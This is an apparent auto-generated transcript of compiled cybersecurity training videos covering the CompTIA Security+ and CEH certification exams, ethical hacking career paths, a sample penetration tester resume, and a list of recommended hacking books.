Cyber security role such as security incident handling and response intrusion detection malware prevention etc the second area of focus is threats attacks and vulnerabilities this includes analyzing indicators of compromise and determining types of malware or comparing and contrasting types of attacks next up we have identity and access management
This topic emphasizes on implementing identity and access management controls or differentiating common account management practices the fourth domain that comptia security plus focuses on is risk management this domain describes the importance of policies plans and procedures related to organizational security finally we have cryptography and pki here the exam deals with questions
Related to comparing and contrasting basic concepts of cryptography and implementing public key infrastructure another key focus area of this exam is how to troubleshoot common security issues and deploy mobile devices securely now coming to the final section of this video where we look at the important skills that you will acquire after
Completing the comptia security plus certification exam first you will learn to detect various types of compromise and understand penetration testing and vulnerability scanning concepts this certification will give knowledge to assess the security posture of an enterprise network and recommend and implement appropriate security solutions you will also get an idea of installing
Configuring and deploying network components while assessing and troubleshooting issues to support organizational security you will gain the desired skills to monitor and secure hybrid environments including cloud mobile and iot comptia security plus certification exams give the experience to install and configure identity and access services you will understand how to identify
Analyze and respond to security events and incidents finally you will grab another crucial skill that is to implement best practices on risk management comptia security plus certification will make you understand how to implement and summarize the risk management best practices and the business impact it ensures you operate with an awareness
Of applicable laws and policies including the principles of governance risk and compliance that was all about the comptia security plus exam taking up this exam will help you learn a lot about cyber security and acquire the necessary skills that will help you become a greater cyber security professional
This is why organizations look for professionals with comptia certification this certification is evidence of your expertise in the security field comptia security plus certification is prevalent among security professionals although the exam requires a lot of hard work to crack the reward is very fruitful all the best to everyone who wishes to
Be comptia security plus certified now let’s begin with who is a certified ethical hacker a certified ethical hacker is a person who is also known as ethical hacker an ethical hacker is just the opposite of a hacker a hacker is a person who with malicious intent tries to misuse vulnerabilities that they have
Identified in an organization structure and then gain access to unauthorized data whereas an ethical hacker does the same thing they try to locate the weakness they try to look at the vulnerabilities and they see how they can be misused however the intent is completely different and that is what
Differentiates a hacker from an ethical hacker hacker would be a criminal with a malicious intent who would try to misuse and personally gain by doing criminal activity from that particular activity that they have done whereas a ethical hacker would try to help the organization in an authorized manner so
That’s where the permission comes into the picture the ethical hacker has permission from the organization to conduct some activity that would identify vulnerabilities or weaknesses in the information technology structure of that organization and then once they have been identified the ethical hacker would then help the organization to plug
Those vulnerabilities rather than misuse those vulnerabilities so any person who completes ch version 10 certification is known as a certified ethical hacker so there’s a certification once you complete that once you pass the exams you can essentially call yourself as a certified ethical hacker and you’re
Going to get a certificate with the same terminology so as you can see in the diagram your responsibility would be as a certified ethical hacker would be with the proper permission of the organization with the authorization coming in with contracts coming in you would legally help the organization to identify those weaknesses and
Vulnerabilities and once you find them you’re going to report them to the organization and you’re going to help the organization with remediation plan which will help them remediate mitigate and resolve the vulnerabilities that you’ve identified thus making the organization’s security structure a lot better based on which black hat hackers
Or malicious hackers would be unable to attack the organization so what is ch version 10 now this course was initially introduced in september 2015 and i think if you look at the versioning this is the 10th version that is there in the market so essentially ceh or the
Certified ethical hacking course as the course itself has been for a long time in the industry it’s a very well accepted course and it’s a well-renowned course the current version as it is was uh introduced in september 2015 and is one of the toughest certifications in the cyber security field this includes a
Lot of information that you have to learn that you have to know before you can attempt the certification you will master all ethical lacking methodologies that are used in penetration testing and ethical hacking situations what does that mean that means that ceh version 10 is a structured course that will help
You look at all the phases that are used in ethical hacking all the terminologies that are utilized all the tools that are utilized in such a manner that you can penetration test or a vulnerability assessment and identify and test the vulnerabilities for their complexity and this course once you complete the course
You would have mastered all the ethical hacking techniques that are required there are two exams one is a written exam and the other is a practical exam now you can opt for either or the written exam is basically a multiple choice question exam where they’ll ask you scenario based questions and you
Have to answer those questions that is something that we’re going to look into during this video the practical exam is basically a simulation exam where they give you a scenario and you have to complete some complete those tests and prove that you are a good ethical hacker based on the
Report that you give if the report tallies to what the test was you would be clearing that exam so practical exam is a little bit tougher it’s more hands-on it tests this actual skills that you would perform in a hacking scenario or ethical hacking scenario does the practical exam going to be that
Much tougher the written exam to give it credence tests you a lot on your mentality on your thought process on your judgment characteristics so they will give you a scenario and ask you what do you think is happening what does this attack trend amount to or would be
Then what what would be the next step in the particular attack that they’re describing does it’s more of an intellectual uh test where your when your thought process are being checked and uh you are giving this exam so what would be the difference between these exams in a practical exam you would be
Conducting all those steps yourself and you would be reaching a conclusion so here essentially you’re being tested on the skills that you have developed on the execution part of it and to see whether you can execute a test end to end whereas in a written exam you will
Be put in the middle of a test where you have to assume something where you have to understand what the steps would have been performed in the in the previous steps and what would be the expected result and you’re supposed to analyze that and then come to the correct answer
So if there is a question which which exam is better written or practical the answer to that is from an intellectual perspective a written exam would be a lot tougher than a practical exam and from an execution perspective a practical exam would be tougher than a
Written exam so it depends on us which exam we want to give both of them are widely accepted and well respected in the information security field so it’s just the option that we choose which exam we want to give now this course the version 10 course is purely attack based
Course okay it is an offensive course there is no defensive mechanisms so if you are looking for questions of how to secure yourself on the internet how to securely configure operating system or how to securely configure a server how to configure a firewall this is not the certification this basically talks about
Attacking those devices so if you come across a firewall how would you test a firewall how would you identify vulnerabilities in those and how would you bypass a firewall similarly if you come across a server how are you going to attack and hack the server let it be
Windows or linux based so this basically becomes an attack based course you’re looking at offensive mechanisms over here and not defensive ones at all so what’s new in this version in this version there’s a new module for iot internet of things it focuses on emerging attacks vectors like cloud artificial intelligence and machine
Learning it basically talks about smart devices and it talks about the vulnerabilities the risk that the smart devices face in today’s world for example it will tell you about the industries that are utilizing all these smart devices why are they utilizing it for what kind of devices they are
Utilizing and what are the risks within those devices it will also give you a lot of tools for you to practice upon to identify such iot devices what would constitute an iot or internet of things device any device which has an ip address and can connect to the internet
And create data so even your smart watch your smartphone your cars that have internet connectivity nowadays uh your google homes amazon alexas all of these devices would come under the iot umbrella and have you ever wondered about sitting at home having a wi-fi having all of these devices even a smart
Tv if you will connected to the wi-fi and have you ever questioned how a hacker would then be able to access your home through all of these devices record information and basically just spy on you similarly an organization where they are utilizing iot they would be vulnerable for the
Same vulnerabilities and this course does include iot security to a certain extent where we talked about vulnerabilities and how to identify those vulnerabilities in iot then there’s a new vulnerability analysis module where it gives you risk assessment it talks about cvss scoring systems it talks about how to do a
Vulnerability management program in the first place what are the steps required in a vulnerability management program how should it be reputable and how it should be measurable as a program and what should be the outcome so basically it will give you a structured way of how to do a vulnerability management
Assessment and how do you want to achieve the end goal thus leading you to a penetration test so all the modules are leveled up what do you mean by leveled up that means they’ve been updated to the latest tools latest standards latest technologies so you’ve got cryptographic attacks you have got
Attacks on applications like sql injection we will be talking about packet sniffing using various tools all of these are upgraded which means they are up to the latest operating system so even when we do this course you’ll be looking at operating systems like windows 10 windows 8 windows server 2012
Windows server 2016 kali linux machines android machines and ubuntu desktop as well so all of the operating systems are latest the tools are latest and you will be interacting with these tools and then there is a mobile security toolkit as well which will help you do a
Penetration test on a mobile device so these are what is new in version 10. now let’s talk about the roles and responsibilities that ethical hacker should have when they actually go into the world now what are the responsibilities roles what are the capabilities that we should have that we
Should be able to look at scripts that would test for vulnerability so for example a sql injection attack it’s a script-based attack let’s say a cross-site scripting attack that is again going to be a script-based attack so we maybe we want to go ahead a little
Bit look at windows systems and do a powershell attack and know about partial scripting a little bit if you look at linux windows there’s a bash shell where there’s bash scripting and you’ll want to learn that scripting as well now the course doesn’t include all these scripting languages it does help you
Understand what these scripting languages are and it does have some basic introduction to how these languages can be utilized to create those scripts then we also want to develop tools to increase security you want to look at those commands that are utilized on all operating systems you
Want to look at the capabilities of the operating systems of how to create security parameters and ensure the operating systems and applications devices are secure you should be able to perform risk assessment now when you say risk assessment risk assessment is the likelihood of an attack being actually
Executed on an organization based on the threats and the vulnerabilities that we have identified so risk assessment is something that you find out of vulnerability and then you try to figure out in a hypothetical manner of what is the likelihood of that vulnerability being exploited by a hacker if they find
That vulnerability and if they do execute that what is the impact that is going to happen on the organization and what is the penalties or the repercussions that the organization is going to face if that vulnerability is exploited that’s what a risk assessment is then we should also be able to
Develop security policies or set up security policies and implement them to ensure that the security mechanisms are standardized and are consistent and then we should also look at training staff for network security to ensure that they are aware of these vulnerabilities and they know what their responsibilities are to maintain some semblance of
Security in the organization so why do we want to become a certified ethical hacker now since you’re watching this video it’s easy to assume that we all are interested in security we all are interested in hacking but hacking is not a real job for us to get a job in the
Industry on a security parameter or information security parameter we want to become a certified ethical hacker so if you look at the popular hacking cases that have happened in 1990s there was a national crackdown on criminals microsoft nt operating system was hacked now this was back in the 90s when
Security wasn’t that much evolved and there were a lot of attacks back then that crippled infrastructure that crippled banks when they started realizing that computing isn’t as easy as it seems of course if you use a computer the functionality is always there but if the functionality is not properly configured you’re just exposing
Yourself to cyber criminals where they’re going to steal information and your organization may just go bankrupt because of that in 2013 an example adobe reported 2.9 million accounts as stolen in 2016 kaspersky which is a internet security firm uh announced that there was 758 million malicious attacks that occurred worldwide imagine that 758
Million malicious attacks that were identified and reported in 2018 facebook reported a loss of 30 millions to accounts that were stolen 2018 again quora reported 100 million customer accounts being stolen and in 2018 again marriott 500 million travelers accounts stolen and manipulated now when you see
Account for a stolen how does it affect the organizations now first and foremost if those accounts were stolen that means usernames and passwords were cracked and those accounts may have contained credit card information or may have contained some personal information that would identify the person the person and does make them gullible
For a social engineering attack or an identity theft attack so it has a cascading effect if i would have been affected or you would have been affected with these attacks the repercussions would have been catastrophic your credit card information being stolen that means somebody else would have misused it and
You would have seen a huge bill come to you come your way now you can go back to the bank and dispute that but that that’s again a dispute that you’re trying to have with the bank for something that you didn’t do which requires a lot of
Energy and a lot of time and at the end of it somebody has to pay for that particular loss now in this scenario the bank would have had to bear the loss but then that’s a loss for the bank and bank doesn’t want to do that and that’s where
They would try to hire certified ethical hackers who try to test these vulnerabilities and plug them in so that the end consumer is also secured the bank is also secured right in this case uh marriott there were 500 million travelers accounts that were stolen a lot of credit card information uh was uh
Leaked out email email accounts were hacked and compromised and does there was a lot of replication that happened now the thing is that there are also laws that these organizations need to adhere to that tell the organizations how to keep their information secure and also have penalties in place if the
Organization gets hacked and the penalties are pretty severe so organizations do not want to get hacked or do not want to get compromised not only from the customers perspective where they would be losing customers losing reputations and then thus facing losses but also from a legislative perspective where they would have to pay
Fines to the government for the frauds that have happened so these are some of the popular hacking cases that have cost these organizations quite a lot of money and does uh they have a lot of security in mind uh if you look at the news in bbc news there was something reported
From a french police that there was a virus that infected more under 850 000 computers worldwide now on the similar lines if you remember ransomwares and if you look at wannacry that happened in 2018 or 2017 it also cost the world 4 billion dollars in losses during that just one
Small month of its infection then apple google basically disclosed that a large scale hacking effort was targeted at apple devices and this has been it has reported that there was a sustained effort to hack high iphones over a period of at least two years which means that there’s a specific target towards
Apple consumers and they are at a higher risk of getting hacked than others then the texas government organizations hit by rat somewhere attack so hackers have infected 23 organizations connected to local government in the u.s state of texas with ransomware that means that their databases have been encrypted the
Government themselves do not have access to that database the databases could have been compromised by the hackers and that means that whatever services were being provided to the users based on that database may no longer be available to the end users because of the ransomware now moving on with these why
Won’t do we want to become a certified ethical hacker increased attacks lead to more job openings now if you look at ransomware the vonakura attack that happened in 2017 there was a knee-jerk reaction given by the rest of the world for i.t security suddenly budgets or started opening up suddenly people
Wanted more ethical hackers on their payrolls to test for vulnerabilities in uk and europe we have gdpr uh which is again another law that imposes severe penalties on organizations that get hacked and for not having proper security and a voluntary assessment and penetration testing program in place so that leads
To a lot of job requirements as well where organizations look at people with this special skill set to help them mitigate the vulnerabilities to keep to safeguard them and their customers from hackers and also from penalties from law enforcement and governments so does the demand keeps on increasing for ethical hackers which automatically
Means that the salaries are going to increase as well so more the demand lesser the supply higher the salaries that’s plain economics then challenge hacker with malicious intent so from ethical hackers perspective it is our duty to safeguard an organization which means that will be pitched against uh
Hackers and we have to ensure that those hackers would be challenged to the maximum limit before they even try to get access to any of the resources that we are trying to protect it offers a boost in your career so more uh efforts that you put in more vulnerabilities
That you find the better the career prospects that you have and the better job aspects that you’re going to get and this also lets you keep yourself updated on the latest technology as a technology progresses as we evolve on technology security will also evolve and the ethical hacker would need to keep
Themselves updated on these technologies let us understand the importance of the ca certification before getting to know about its content so why should you take up the ch version 11. the certified ethical hacker is the most trusted ethical hacking certification and a recommended one by employers around the globe
Since the introduction of the ca certification in 2003 it is globally recognized as a standard within the information security field the ch version 11 by ec council continues to keep up to the standard and it familiarizes the latest hacking techniques and teaches you advanced hacking tools and exploits used the ch
Version 11 aligns with the current cyber security market requirements and adds the latest advancements in the cyber security field the ca certification helps and trains you to think like a hacker and this in turn helps you beat a hacker and defend your network after obtaining the ca certification you’ll be a certified
Ethical hacker a certified ethical hacker is a skilled professional working in a red team environment who safeguards networks and understands attack strategies and mimics the skills of malicious hackers certified ethical hackers discover vulnerabilities in a system and operate with permission from the system owners only so who can become
A certified ethical hacker and who can take up the ca certification let us have a look at that now in the first case to be eligible for the ca certification exam you need to attend the official training from authorized ec council training partners it can be an online training or tutor led training
From ec council learning partners only then are you eligible to take up the ca certification exam so a candidate who has completed an official ec council training is eligible to take up the exam without going through the application process or in the second case in order to be
Considered for this credential you need to have at least two years of work experience in the information security domain and you must pay a non-refundable application fee and submit an eligibility application form once it is approved you can take up the ch exam after the application is approved you
Can purchase the test voucher in the latest version of the ceh we will see the addition of various core concepts moving on to our next topic let us see how different the ch version 11 is and few of its objectives firstly it outlines ethical hacking concepts cyber kill chain concepts and
Overview of information security and various laws and regulations related to information security this certification briefs you about the faces of system hacking attacking techniques and how you can maintain access it also briefs you about footprinting concepts and ways of utilizing food printing tools along with necessary countermeasures the next objective is to familiarize
With vulnerability assessment along with a hands-on experience of various scanning tools next we have cyber security threats like malware threats analysis of various worms viruses and trojans various malware concepts packets sniffing concepts and techniques have been introduced into this domain it also highlights the concepts related to social engineering denial of service
Attacks sql injection and aviation techniques it also speaks about wireless hacking concepts and mobile device management the concept of operational technology is a new addition this time next is getting acquainted with security solutions like firewalls honeypots ips their evasion and protection our fifth point is knowing various topics in cryptography like encryption
Algorithms public key infrastructure and cryptanalysis moving on the next objective is to incorporate padded security os as it offers better performance on lower powered laptops and machines when compared to kali linux next is to learn to recognize and deal with iot based vulnerabilities and attacks with the ch version 11 course
That covers the latest iot hacking tools you would be required to ensure the safety of iot devices our next point is with respect to the evolving cloud industry you would need to learn how to identify and defend cloud-based threats and attacks the latest version of ch includes new operating systems and windows 10
Configured with domain controller and vulnerable web applications for improving hacking skills finally what is different is that more than 50 percent of the ch version 11 course is dedicated to practical skills in live ranges via ec council labs ec council leads in this aspect of the
Industry now that we saw the ch exam objectives let us look into the ch exam topics weightage as you see on your screens this is a pie chart with nine domains in ch along with their weightages you can prepare for your exam accordingly let us move on and take a closer look at
Each of these domains their respective subdomains and their descriptions our first domain is information security and ethical hacking overview this domain consists of questions from information security cyberkill chain concepts ethical hacking concepts various hacking concepts and information security laws and standards you can expect a total number of eight
Questions from this domain the weightage of this section is six percent the second domain is reconnaissance techniques under the subdomains we have footprinting and reconnaissance at first this covers various topics like footprinting concepts footprinting methodology email footprinting footprinting through web services dns footprinting footprinting through social engineering etc
The next subdomain in this section is scanning networks scanning networks covers various concepts like scanning tools host discovery port and service discovery os discovery draw network diagrams scanning beyond ids firewall etc and our third subdomain under reconnaissance techniques is enumeration various topics like snmp enumeration ntp and nfs enumeration smtp and dns
Enumeration and enumeration countermeasures are covered under this subdomain a total of 26 questions will be asked from this domain under footprinting and reconnaissance you will have 10 questions and under scanning networks and other 10 and finally under enumeration you’ll have 6 questions a total weightage of 21 is given to this particular topic
Our third domain is system hacking faces and attack techniques under our third domain our first sub domain is about vulnerability analysis this sub domain covers topics on vulnerability assessment vulnerability classification vulnerability assessment solutions and tools and various vulnerability assessment reports our next sub-domain is about system hacking you have concepts like gaining access
Cracking passwords vulnerability exploitation escalating privileges maintaining access covered under this subdomain and finally we have malware threats under this domain malware threats incorporate concepts like apt concepts trojan concepts virus and worm concepts malware analysis and so on a total of 21 questions will be asked from this domain under vulnerability analysis there will
Be nine questions asked system hacking and other six questions and finally under malware threats you will have six other questions asked that sums up to a total 21 with a weightage of 17 for this domain our fourth domain is about network and perimeter hacking here you have various subdomains and one
Of it is social engineering under social engineering you will be asked questions based on social engineering techniques insider threats impersonation on social networking sites identity theft and so on you’ll also have various question on the sniffing concepts as it is another sub domain you can also expect questions from the
Denial of service subdomain here questions related to botnets and ddos attacks will be asked various session hijacking concepts are another crucial part of this domain the final subdomain is about evading ids firewalls and honeypots here various concepts on ids ips firewall and honeypots are covered you
Will need to understand how to evade ids and firewalls and how to detect honeypots a total number of 18 questions will be asked from the fourth domain that was network and perimeter hacking and the weightage for this domain is 14 our fifth domain is about web application hacking and our first sub
Domain in it is hacking web servers this incorporates concepts related to web server attacks web server attack tools patch management and so on the next sub domain is about hacking web applications here you have various concepts related to bypass client side controls analyze web applications footprint web infrastructure attack
Access controls and how to perform injection attacks and so on finally under the sql injection subdomain you will have questions based on sql injection the types of sql injection the sql injection methodology sql injection tools aviation techniques and sql injection countermeasures here a total of 20 questions will be asked from this domain
And that is a weightage of 16 will be given to the web application hacking domain our 6 domain is solely devoted to wireless network hacking this domain focuses on hacking wireless networks various wireless concepts wireless encryption wireless threats wireless hacking tools various hacking methodologies bluetooth hacking and wireless counter measures are covered a
Total of eight questions will be asked from this domain with a weightage of six percent our seventh domain is all about mobile platform iot and ot hacking our first subdomain here is hacking mobile platforms here the concepts that are touched upon our mobile platform attack vectors hacking android os hacking ios mobile
Device management and mobile security guidelines and tools our next subdomain here is about iot and ot hacking which covers concepts on iot hacking tools its methodologies counter measures and it also speaks about ot concepts ot attacks ot hacking tools and ot counter measures you have a total of 10 questions asked
From this domain with a weightage of 8 the next domain is very interesting and it is all related to cloud the cloud computing domain covers concepts based on cloud computing serverless computing cloud computing threats cloud hacking and cloud security the weightage given to this domain is six percent with the
Total number of questions of seven and finally we have cryptography as our ninth domain as the name suggests this domain covers topics based on cryptography concepts encryption algorithms cryptography tools public key infrastructure email encryption disk encryption cryptanalysis and counter measures and seven questions will be asked from
This domain with a weightage of six percent now that you saw the ch exam topics weightage let us have a closer look at the ch exam details let us first have a look at the ch exam based on mcqs the exam title is certified ethical hacker with the exam code of 312-50
This exam will have 125 questions with a time limit of 4 hours the test format is multiple choice questions the pass percentage varies ideally between 60 to 85 percent now let’s have a look at the ch practical exam details in order to gain the ch master recognition it is mandatory that you
Take up the ch practical exam as well the exam title is certified ethical hacker practical and this practical exam will have 20 questions with a duration of 6 hours the exam format will be ilab cyber range and finally the passing score for the ch practical exam is at 70 percent after
Clearing both the mcq based exam and the practical exam you can get the ch master recognition now that we had a look at the ch exam details let us have a look at the career prospects for a professional with this certification having the ch certification guarantees that you have an insight into the
Hacking world hence companies want to hire professionals who can think like a hacker and safeguard their networks and systems a candidate with the ca certification can apply for various cybersecurity job roles such as penetration tester security engineer and information security analyst from the long list according to pay scale the annual
Average salary of a ch professional in india is rupees 5 lakhs per annum meanwhile in the united states a professional holding the ca certification earns nearly 93 000 on an average basis annually now that you had a look at the ch version 11 certification and its career prospects
What are you waiting for get certified with simply learn and back that ca certification with the increase in the number of cyber crimes across the globe there is also an increase in the number of cyber security jobs and the role of an ethical hacker tops the list hi guys
This is shruti from simply learn and today i will run you through this video on ethical hacking career so let’s get started and explore the world of ethical hacking let’s begin with a few facts did you know that by the year 2021 there will be 3.5 million cyber security job
Openings that is a huge number isn’t it and also according to the u.s bureau of labor statistics there will be 28 increase in the number of jobs from 2016 to 2026 for information security analysts which includes ethical hackers this proves that there is a great demand
For ethical hackers at the moment as i mentioned earlier the number of cyber crimes across the world will increase as the digital era will only continue to grow organizations will be on the lookout to hire professionals who can fight these cyber crimes and protect the company’s data and to fight these cyber
Crimes we will require individuals who can think like a hacker and who is that well to do this job we have ethical hackers as you might be knowing an ethical hacker is trained to discover system vulnerabilities an ethical hacker is also known as a white hat hacker he
Or she is given authorization from the company to perform security assessments and at the end an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed an ethical hacker performs these security assessments with the help of various hacking techniques and tools
Let’s now move on to our next topic that is the steps to become an ethical hacker you might wonder how to start your ethical hacking career right well i will take you through that step by step firstly the candidate must have a computer science or an information technology bachelor’s degree it is also
Possible to become an ethical hacker without these degrees but provided you have the required skill sets and experience the next requirement to be an ethical hacker is that the candidate must have a minimum of two years of experience in the information security field you have to start your career with
A software or a networking job and only then can you move on to the ethical hacking field you have to start your career with a software or a networking job and only then can you move into the ethical hacking field coming to the certifications it is necessary for the
Candidate to hold various cyber security certifications certifications play a vital role in the field of cyber security your job opportunities can solely depend on these certifications to become an ethical hacker you can start off with the foundational level certifications such as the ccna and comptria security plus certifications
Finally the last step to become an ethical hacker is to clear the certified ethical hacker examination ch certification is provided by the ec council it trains the candidate to protect a company’s network by using the same tools and methods that a hacker would use the ch exam will have a
Duration of 4 hours with 125 number of questions if the candidate clears this exam then he or she will become a certified ethical hacker now that you know the steps to become an ethical hacker let’s look into the skill sets which are required to help you achieve these steps first and foremost an
Ethical hacker needs to have an in-depth knowledge of the working of the operating systems knowledge of windows linux and macintosh operating systems is required for penetration testing creating exploits and bug hunting programming will be important so knowledge of programming languages such as cec plus plus html python and php
Will be very helpful basic knowledge of networking tcp protocols and osi model is necessary as networking is the foundation of cyber security for securing databases knowledge of sql nosql postgresql is necessary cryptography is used to secure information it is the process of converting data from a readable format
To a non-readable format and vice versa cryptanalysis is decryption without a secret key in most cases certified ethical hacker would need to perform cryptanalysis hence ethical hacker has to be comfortable with cryptography and cryptanalysis ethical hackers should be proficient in network security control measures such as intrusion detection and intrusion prevention techniques now
Let’s move on to the responsibilities which are taken care of by an ethical hacker let’s have a look at these responsibilities an ethical hacker is responsible for scanning systems open and closed ports using tools like which can make the organization vulnerable to an attack in addition to building and maintaining ids ips and
Firewalls they also try to evade these security measures to gauge the performance of the systems a lot of times a company’s online fraud or online theft incidents are looked into by an ethical hacker an ethical hacker also checks for sniffing networks and hijacked web servers and applications those were the responsibilities of an
Ethical hacker now let’s look into the various job roles an ethical hacker can apply for it is a misconception that an ethical hacker will perform only penetration testing well there are a number of other jobs an ethical hacker can apply for the different job roles such as that of a penetration tester
Information security analyst security consultant and an information security manager let’s have a look at each of these job roles one by one a penetration tester performs the typical responsibility of an ethical hacker that is he or she tries to exploit a security system’s vulnerabilities this is carried out using different hacking tools and
Techniques an ethical hacker can also apply for the role of an information security analyst there is a difference between the job rules of a penetration tester and that of an information security analyst here the candidate will be required to primarily design and protect the organization’s network from various cyber attacks finally the
Candidate is also required to document the identified security breaches so that it can be omitted the next time the responsibilities of a security consultant is more or less similar to that of an information security analyst that we saw previously as a security consultant you will be responsible to design implement and maintain barrier
Security architectures in addition to this you’re also required to upgrade the security systems as and when required finally an ethical hacker can also apply to the role of an information security manager as the name suggests this role will require the candidate to possess managerial skills as an information
Security manager is responsible to head the it and the information security team now that we have seen the responsibilities the skills and the steps to become an ethical hacker let’s have a look at the different companies hiring ethical hackers to name a few we have bank of america ernest and young
Kpmg urban pro and ibm let’s now look into the salary structure of an ethical hacker well in india the average annual salary of a certified ethical hacker is nearly 4 lakhs 76 000 rupees and in the us the average annual salary of a certified ethical hacker is 91 000
Now i will guide you through a sample resume of a penetration tester as you can see on your screens this is a sample resume of a penetration tester we will look into this resume closely and understand how your resume should look like if you are applying for the role of
A penetration tester as always you can start off with your name and your email id and your phone number followed by a brief summary of your current job profile it is prefer to add your linkedin profile link here and also your github profile link if you have one as i
Mentioned earlier this is a sample resume for a penetration tester and hence we have to have more than two years of experience in the information security field as you can see under the experience section the candidate has two prior experiences out of which the first experience is that of a software tester
And second is that of a penetration tester you would have to mention your latest or current experience at the beginning you can mention your job role and the company and the duration under which you can list out the various responsibilities that you are looking into currently if you are a penetration
Tester you can mention responsibilities such as security monitoring black box testing documentation of the results vulnerability scanning and so on below this you can mention your first company’s experience with the roles and responsibilities that you have performed earlier here the candidate was a software tester before becoming a
Penetration tester let’s move on to the education section here the candidate holds a bachelor’s degree in computer science you can mention your degree followed by the university name or if you’re applying for any other role in the cyber security domain it is recommended that you list out the
Certifications as well to start off with a ccna certification will be preferred followed by a certified ethical hacker certification which is a must if you are applying for the role of a penetration tester in addition to it the certified expert penetration tester certification will also hold a great advantage after
Mentioning the certifications you can go ahead and mention your skill sets here we have the technical skills and non-technical skills under technical skills you can mention the programming languages that you know here we have c c plus plus java perl you can also mention the operating systems that you have
Worked on for example windows linux unix and in addition to the programming languages and the os you can also mention the tools that you know such as nmap metasploit tools which will be helpful if you are applying for the role of a penetration tester then you can also mention encryption technologies
Knowledge of sql and bug tracking systems if you have worked on them before if you have participated in a code authored you can mention that here as well under the non-technical skills you can mention various competitions that you have taken part in and the games that you like and other
Extracurricular activities finally you can also mention the projects undertaken under the projects undertaken you can talk about the various projects that you have performed in your company or outside the company here we have two projects one as a software test engineer and second one as a penetration tester
So this is how a resume of a penetration tester will look like before jumping into the best books for ethical hacking let’s speak a bit about cyber security i’m sure you all already know what cyber security is but here’s a refresher cyber security refers to the practice of protecting networks programs computer
Systems and their components from unauthorized digital access and attacks did you know that according to the university of maryland hackers attack every 39 seconds that is on an average 2244 times a day now that’s a huge number speaking of hacking let’s define the term ethical hacking before diving into the books for it
So when a system’s vulnerabilities are discovered and exploited with the motive of ensuring system security it is known as ethical hacking people who carry this out are termed as ethical hackers ethical hackers perform hacking with prior permission from the concern authorities in order to perform this and carry out penetration testing various
Hacking techniques and tools are used now let’s go ahead and have a look at how books can help you learn to hack the books we are going to talk about in this live session will familiarize you with hacking on the whole these books will introduce you to new ideas and help
You solve problems reading in general is great as it helps with your thought process and keeps you mentally alert it is important that you use the information in the upcoming books only for lawful purposes so let’s get started and see the best books which can help you with hacking
The first book we have is the basics of hacking and penetration testing this book is written by patrick ingretzen for all your beginners out there if you’re clueless about how to go about hacking then this is a good read for you all having said that this book
Is not just for beginners but even for those individuals who are only exposed to superficial penetration testing logic this book dives deep into the tools and processes that are used by penetration testers to gain access to the systems the basics of hacking and penetration testing book will help you achieve a
Better understanding of offensive security as well you’ll be acquainted with various phases of ethical hacking here the book contains seven chapters and it focuses on hacking tools such as backtrack linux google reconnaissance nmap nessus metasploit and hacker defender rootkit to name a few the fun part is that each chapter consists of
Hands-on exercises that help you interpret and implement results in each phase this book is apt for students beginning infosec professionals and security consultants the second book we have is hacking a beginner’s guide to computer hacking basic security and penetration testing it is written by john slavio this is yet another go-to book for
Beginners this book can be your first step to a career in ethical hacking it will cover all the basics with respect to hacking security and pen testing the tools covered in this book are history of hacking types of hackers various types of hacking attacks basic hacking tools and software and hiding ip
Address it also speaks about mobile hacking hacking an email address penetration testing and spoofing attacks up next we have hacking the art of exploitation it is written by john erickson this book has two editions one which was published in 2003 and the other in 2008. this book is famous for the hacking
Approach it teaches it focuses on network security and computer security it helps you understand how to develop exploits rather than just using them if you want to up your ethical hacking game then this book definitely requires a read hacking the art of exploitation in its second edition introduces you to c
Programming from a hacker’s perspective out of the plethora of concepts that you will learn in this book few crucial ones are that you will learn to program computers using c and shell scripts you will also be able to outplay security measures like intrusion detection systems having said that you will also
Learn to hijack tcp connections crack encrypted wireless traffic and speed up brute force attacks let’s now have a look at the next ethical hacking book on our list and that is kali linux ethical hackers cookbook this book revolving iran kali linux is written by himanshu sharma kali linux is primarily used for
Advanced penetration testing and also for security auditing it contains numerous tools that are geared towards various security tasks such as security research penetration testing and so on this book will help you get started with installation and configuration of kali linux which will enable you to perform your tests
In addition to that you will learn to perform web application exploitation using tools such as burp you will also be acquainted with performing network exploitation using metasploit and by a shark lastly you will know how to conduct advanced penetration testing these were few of the concepts you will
Be learning besides a lot more others in the book at number 5 we have metasploit the penetration testers guide this book is written by four authors david kennedy jimmy gorman devon kearns and martiaroni the metasploit framework is a powerful tool for hackers to exploit ip addresses and ports in it
This framework makes discovering and exploiting vulnerabilities easy but for first time users it can be a little tricky hence this book will teach you all about metasploit you will learn the frameworks interfaces module system and more as you launch simulated attacks after which you will move on to advanced penetration testing
Techniques which include network reconnaissance client-side attacks wireless attacks and targeted social engineering attacks you will also learn to integrate nexpose nmap and nesses with metasploit to automate discovery up next we have penetration testing a hands-on introduction to hacking this book is written by georgia weedman as the name suggests this book shows an
Insight into penetration testing a penetration tester discovers security weaknesses in operating systems networks and applications penetration techniques are used to gauge enterprise defenses this book focuses on the core skills and techniques a penetration tester requires here you will go through the prime stages of an actual assessment which includes gathering information under
Vulnerabilities gaining access to networks and so on in addition to the above you will learn to track passwords with the techniques of brute forcing and word lists bypass antivirus software automate attacks and you will also learn to use metasploit framework for launching exploits and for writing your own metasploit modules out
Of the many other learnings moving on to our next book we have the hacker playbook 3. the hacker playbook 3 practical guide to penetration testing is written by peter kim this is the third iteration of the hacker playbook series it brings with itself new strategies attacks exploits tips and tricks
Besides all the new concepts it also highlights a few techniques from the previous versions many schools have this book incorporated in their teaching the hacker playbook 3 red team edition acquaints you with the red team red teams simulate real world advanced attacks to test your organization’s defensive teams a red teamer will
Accurately test and validate the overall security program reading the hacker playbook 3 will help you advance your offensive hacking skills and attack parts in addition to that it also focuses on real-world attacks exploitation custom malware persistence and more this heavily lab-based book will incorporate several virtual machines and custom the hacker playbook tools
At number eight we have black hat python python programming for hackers and pen testers justin seeds is the author of this book as you know python is a very strong programming language and it comes to great use when creating powerful and effective hacking tools python is the chosen language by many security
Professionals across the world and many exploit frameworks are written in python in this book you will go through the darker side of python’s capabilities like infecting virtual machines writing network sniffers creating trojans etc this book covers some networking fundamentals interesting network tooling web applications windows privilege escalation tricks and more this book as
The author says is a fun read moving on at number 9 we have the web application hacker’s handbook finding and exploiting security flaw it is written by david started and marcus pinto this new edition focuses on updated web applications exposing them to attacks and executing fraudulent transactions this web application hackers handbook is
Updated to speak about the latest step-by-step methods for attacking and defending the large range of ever evolving web applications it also discusses new remoting frameworks html5 ui redress and hybrid file attacks to name a few it looks into attacking authentication attacking the application server finding vulnerabilities in source code etc if
